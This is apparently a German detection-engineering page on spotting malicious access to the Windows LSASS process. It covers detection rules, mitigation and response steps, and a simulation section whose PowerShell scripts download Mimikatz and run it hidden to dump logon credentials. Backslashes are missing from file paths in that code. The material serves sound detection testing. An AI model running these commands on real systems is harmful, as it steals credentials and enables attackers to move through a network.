Jagdsaison auf bösartige LSASS-Zugriffe in Windows-Umgebungen
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Der Artikel beschreibt, wie Angreifer Anmeldeinformationen extrahieren, indem sie mit Tools wie Mimikatz und Cobalt Strike auf den LSASS-Prozess zugreifen. Es werden die typischen Windows-API-Aufrufe, DLLs und Zugriffsrechte behandelt, die beim Dumping des LSASS-Speichers beteiligt sind. Die Autoren teilen aktualisierte Erkennungsabfragen für Sysmon und andere EDR-Plattformen, mit dem Schwerpunkt auf der Stärkung der Erkennungsabdeckung für das Credential-Dumping.
Untersuchung
Das Splunk Threat Research Team emulierte den LSASS-Zugriff mit Atomic Red Team, Mimikatz, Invoke-Mimikatz und Cobalt Strike. Sie erfassten Sysmon-Telemetrie, die das Laden von DLLs (dbgcore.dll, dbghelp.dll, ntdll.dll) und charakteristische GrantedAccess-Werte zeigt. Dieses Datenset wurde dann verwendet, um Erkennungsabfragen abzustimmen, die CallTrace-Informationen mit spezifischen Zugriffsrechten korrelieren.
Minderung
Passen Sie Sysmon- oder EDR-Richtlinien an, um Prozesszugriffsereignisse gegen lsass.exe zu protokollieren, indem Sie Filter auf bekannte DLLs und relevante Zugriffsrechte anwenden und vertrauenswürdige Systemprozesse auf die Whitelist setzen. Verwenden Sie die bereitgestellten Abfragen, um Warnungen zu verdächtigen LSASS-Zugriffsmustern zu erzeugen. Überprüfen und verfeinern Sie diese Regeln kontinuierlich, da neue Tools und Techniken auftauchen.
Reaktion
Wenn eine Erkennung ausgelöst wird, validieren Sie den Ursprungprozess, den zugehörigen Benutzerkontext und die an LSASS-Zugriff beteiligten DLLs. Isolieren Sie den betroffenen Endpunkt, erfassen Sie den Speicher für eine tiefere forensische Analyse und bewerten Sie Hinweise auf den Diebstahl von Anmeldeinformationen. Untersuchen Sie den Prozessbaum, um legitime administrative Dienstprogramme von Aktivitäten zu unterscheiden, die auf einen Angreifer hinweisen.
Angriffsfluss
Wir aktualisieren diesen Teil noch. Melden Sie sich an, um benachrichtigt zu werden
Benachrichtige michErkennungen
HackTool – Allgemeiner Prozesszugriff
Anzeigen
Verdächtiges Laden von Dbgcore/Dbghelp DLLs aus unüblichem Ort
Anzeigen
Verdächtiger Prozesszugriff auf LSASS mit Dbgcore/Dbghelp DLLs
Anzeigen
Erkennen des LSASS-Credential-Dumpings über Prozesszugriff [Windows Sysmon]
Anzeigen
Simulation Ausführung
Voraussetzung: Der Telemetrie- und Basislinien-Vorflug-Check muss bestanden haben.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Angreifertechnik (TTP), die dazu entwickelt wurde, die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.
-
Angrifferzählung & Befehle:
Ein Angreifer hat lokale Administratorrechte auf dem Opferhost erlangt und möchte Anmeldeinformationen für seitliche Bewegungen ernten. Sie kopieren das Open-Source-Tool Mimikatz auf die Maschine, erhöhen den Prozess auf DEBUG Rechte und rufen dassekurlsa::logonPasswordsModul auf, das LSASS-Speicher über native API-Aufrufe liest, dientdll.dlldurchqueren. Sysmon protokolliert dies als ein ProcessAccess-Ereignis mit mehreren HochprivilegiertenGrantedAccessFlags (z.B.0x0010,0x1400,0x1fffff). Der Angreifer führt das Tool aus einer versteckten PowerShell-Sitzung aus, um eine UI-Exposition zu vermeiden.# 1. Mimikatz-Binärdatei in %TEMP% ablegen $mkPath = "$env:TEMPmimikatz.exe" Invoke-WebRequest -Uri "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0/mimikatz_trunk.zip" -OutFile "$env:TEMPmk.zip" Expand-Archive -Path "$env:TEMPmk.zip" -DestinationPath $env:TEMP -Force Move-Item -Path "$env:TEMPmimikatzx64mimikatz.exe" -Destination $mkPath -Force # 2. Führen Sie Mimikatz mit Befehlen zum Dumpen von Anmeldeinformationen aus Start-Process -FilePath $mkPath -ArgumentList 'privilege::debug sekurlsa::logonPasswords exit' -WindowStyle Hidden -Wait -
Regressionstest-Skript:
# ---------------------------------------------------------------------- # LSASS-Credential-Dumping-Simulation – löst Sigma-Regel #4e0789a0 aus… # ---------------------------------------------------------------------- # Mimikatz ablegen (falls nicht bereits vorhanden) $mkPath = "$env:TEMPmimikatz.exe" if (-Not (Test-Path $mkPath)) { $zip = "$env:TEMPmk.zip" Invoke-WebRequest -Uri "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0/mimikatz_trunk.zip" -OutFile $zip Expand-Archive -Path $zip -DestinationPath $env:TEMP -Force Move-Item -Path "$env:TEMPmimikatzx64mimikatz.exe" -Destination $mkPath -Force Remove-Item $zip -Force } # Führen Sie Mimikatz aus, um LSASS-Anmeldeinformationen zu dumpen $args = 'privilege::debug sekurlsa::logonPasswords exit' Write-Host "[+] Mimikatz für LSASS-Dump ausführen..." Start-Process -FilePath $mkPath -ArgumentList $args -WindowStyle Hidden -Wait Write-Host "[+] Mimikatz-Ausführung abgeschlossen." # ---------------------------------------------------------------------- -
Bereinigung Befehle:
# Entfernen Sie die Mimikatz-Binärdatei und alle restlichen Dateien $mkPath = "$env:TEMPmimikatz.exe" if (Test-Path $mkPath) { Remove-Item $mkPath -Force } $folder = "$env:TEMPmimikatz" if (Test-Path $folder) { Remove-Item $folder -Recurse -Force } Write-Host "Bereinigung abgeschlossen."